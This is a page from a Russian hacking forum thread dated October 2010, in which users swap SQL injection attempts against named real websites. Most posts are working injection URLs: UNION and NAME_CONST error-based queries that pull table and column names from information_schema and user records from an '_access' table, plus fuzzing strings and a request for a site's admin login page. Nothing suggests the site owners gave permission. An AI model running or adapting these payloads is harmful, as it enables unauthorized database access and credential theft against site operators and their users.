HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15401  
Старый 20.10.2010, 23:36
MastaBass1
Новичок
Регистрация: 25.12.2009
Сообщений: 16
С нами: 8620050

Репутация: 0
По умолчанию

Цитата:
Сообщение от Konqi  
http://ollis.ru/index.php?id=S00000645')+union+select * FROM (select * FROM (select NAME_CONST((select table_name FROM information_schema.tables+where+table_schema=datab ase() LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select table_name FROM information_schema.tables+where+table_schema=datab ase() LIMIT 1), 14)e) b)a--+&type=ollis_picture&action=&mode=popup
перебирай лимит ом
Просто лимит 1 потом 2 и т.д.? Не догнал...

Делаю так

http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select user FROM _access LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select user FROM _access LIMIT 1), 14)e) b)a--+

гонит Unknown column 'user' in 'field list'

побывал и логин и много чего
 
Ответить с цитированием

  #15402  
Старый 21.10.2010, 06:06
gabarea
Новичок
Регистрация: 30.03.2010
Сообщений: 2
С нами: 8482939

Репутация: 0
По умолчанию

http://comunidad.encuentra24.com/browse_businesses_locations.php?businesscat_id=10
 
Ответить с цитированием

  #15403  
Старый 21.10.2010, 06:40
boxazbox
Новичок
Регистрация: 21.09.2010
Сообщений: 9
С нами: 8232086

Репутация: 6
По умолчанию

и что ?
 
Ответить с цитированием

  #15404  
Старый 21.10.2010, 09:40
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами: 9288132

Репутация: 571
По умолчанию

Цитата:
Сообщение от MastaBass1  
http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select user FROM _access LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select user FROM _access LIMIT 1), 14)e) b)a--+
гонит Unknown column 'user' in 'field list'
побывал и логин и много чего
Хватит уже тыкать таблицы и колонки наугад. У тебя 5-ая ветка, ничего подбирать не надо, просто почитай хоть одну статью...

Колонки в таблице _access

http://ollis.ru/index.php?id=S00000645')+union+select * FROM (select * FROM (select NAME_CONST((select column_name FROM information_schema.columns+where+table_name=0x5f61 6363657373 LIMIT 0,1), 14)d) as t JOIN (select NAME_CONST((select column_name FROM information_schema.columns+where+table_name=0x5f61 6363657373 LIMIT 0,1), 14)e) b)a--+&type=ollis_picture&action=&mode=popup

Ну и:

http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select user_id FROM _access LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select user_id FROM _access LIMIT 1), 14)e) b)a--+
 
Ответить с цитированием

  #15405  
Старый 21.10.2010, 11:33
EoGeneo
Познающий
Регистрация: 29.08.2009
Сообщений: 75
С нами: 8789993

Репутация: 5
По умолчанию

Цитата:
Сообщение от None  
http://veer[antigoogle]mirov.ru/forum/?f=1&p='
Странная скуля, даже кол-во полей подобрать немогу.
 
Ответить с цитированием

  #15406  
Старый 21.10.2010, 17:43
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
С нами: 8762549

Репутация: 1069


По умолчанию

Цитата:
Сообщение от EoGeneo  
Странная скуля, даже кол-во полей подобрать немогу.
может всё таки её там нет...

http://veermirov.ru/forum/?f=1&p=999999999999999999
 
Ответить с цитированием

  #15407  
Старый 21.10.2010, 20:33
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами: 9555536

Репутация: 95
По умолчанию

помгите найти админку nll.com =)
 
Ответить с цитированием

  #15408  
Старый 21.10.2010, 21:05
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
С нами: 8836437

Репутация: 136
По умолчанию

nll.com/horde/imp/login.php
 
Ответить с цитированием

  #15409  
Старый 21.10.2010, 21:38
hakrat
Новичок
Регистрация: 26.09.2010
Сообщений: 8
С нами: 8224886

Репутация: 0
По умолчанию

Нужна помощь,здесь есть иньекция

http://steroidanabolic.com/phpBB/privmsg.php?mode='%22%5C'%5C%22);|]*{%0d%0a%3C%00%3E&u=186

http://steroidanabolic.com/phpBB/viewforum.php?f=1&start=-268435455
 
Ответить с цитированием

  #15410  
Старый 21.10.2010, 23:27
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию

Цитата:
Сообщение от YuNi|[c  
спс
пробовал так:
http://site.net/script.php?seeking_sex=1') and ('1'='1+order by 1/*
без ошибок но и без профилей
а так:
http://site.net/script.php?seeking_sex=-1') and ('1'='1+order by 1/*
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2' OR user_master.seeking_sexuality like '%,2' OR user_mas' at line 13
http://site.net/script.php?seeking_sex=-1') OR ('1'='1+order by 1/*
без ошибок но и без профилей
что то не получится чтол
ну лан палит то палим линк главное найти хот какую решение:

http://www.nz.adultxdating.com/search_get.html

POST

txt_user_sex=2&txt_agefrom=20&txt_ageto=25&search_ submit.x=52&search_submit.y=14&sel_state_id=12&txt _seeking_sex%5B%5D=1'

Это уже посмотрел профи и пока ниче может народ что скажет (много мозгов)? В первые встречаю такой гемор.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.